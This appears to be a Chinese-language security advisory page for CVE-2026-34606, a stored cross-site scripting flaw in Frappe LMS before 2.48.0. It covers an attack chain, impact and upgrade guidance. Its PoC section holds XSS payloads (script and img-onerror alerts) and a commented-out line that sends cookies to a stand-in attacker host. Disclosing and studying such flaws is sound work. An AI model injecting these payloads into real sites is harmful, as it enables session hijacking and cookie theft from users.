CVE-2026-34606 CVSS 6.1 中危

CVE-2026-34606 Frappe LMS 存储型XSS漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34606

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Frappe Learning Management System (LMS)

漏洞概述

Frappe Learning Management System (LMS) 在 2.27.0 至 2.48.0 之前的版本中存在存储型跨站脚本（XSS）漏洞。由于未能充分过滤用户输入，攻击者可在系统中注入恶意脚本。当其他用户访问被注入的内容时，脚本将在其浏览器中执行，可能导致会话劫持或敏感信息泄露。该问题已在 v2.48.0 版本中修复。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS）。Frappe LMS 在特定版本中未对用户提交的数据进行严格的输入验证和上下文相关的输出编码。攻击者无需身份认证，即可利用系统中的输入接口（如课程描述或评论功能）提交包含恶意 JavaScript 代码的 payload。这些 payload 被持久化存储在数据库后端。当具有权限的用户（如管理员）访问并渲染这些被污染的页面时，恶意脚本将在其浏览器环境中自动执行。由于 CVSS 向量显示作用域可变（S:C），攻击者可借此窃取 Session Cookie、执行未授权操作，甚至利用受害者的权限进一步攻击系统内部组件，严重威胁数据的机密性和完整性。

攻击链分析

STEP 1

侦察

攻击者识别目标系统运行的是存在漏洞的 Frappe LMS 版本（2.27.0 至 2.48.0 之前）。

STEP 2

漏洞利用

攻击者构造包含恶意 JavaScript 代码的 Payload，并通过系统表单（如课程创建或评论）提交至服务器。

STEP 3

持久化

服务器接收并存储该恶意数据到数据库中，未进行适当的转义或过滤处理。

STEP 4

触发执行

当管理员或普通用户浏览包含该恶意数据的页面时，服务器将其读取并呈现给浏览器。

STEP 5

攻击生效

受害者的浏览器解析并执行恶意脚本，导致 Cookie 窃取或会话被劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- 
PoC for CVE-2026-34606 (Stored XSS in Frappe LMS)
Description: Inject a script payload into a vulnerable field (e.g., Course Name or Description).
-->

<script>
// Simple PoC to demonstrate execution
alert('CVE-2026-34606: XSS Executed');

// Advanced Payload (Stealing Cookies)
// var i = new Image();
// i.src = "http://attacker-server.com/steal?c=" + document.cookie;
</script>

<!-- Alternatively, using an image tag to bypass simple filters -->
<img src=x onerror=alert('XSS')>

影响范围

Frappe LMS >= 2.27.0, < 2.48.0

防御指南

临时缓解措施

建议立即将系统升级至修复版本 v2.48.0。若暂时无法升级，应在 Web 应用防火墙（WAF）中添加针对 XSS 攻击的检测规则，并临时禁用非必要的用户内容提交功能，或对已提交的内容进行严格的人工审核与清洗，以降低攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表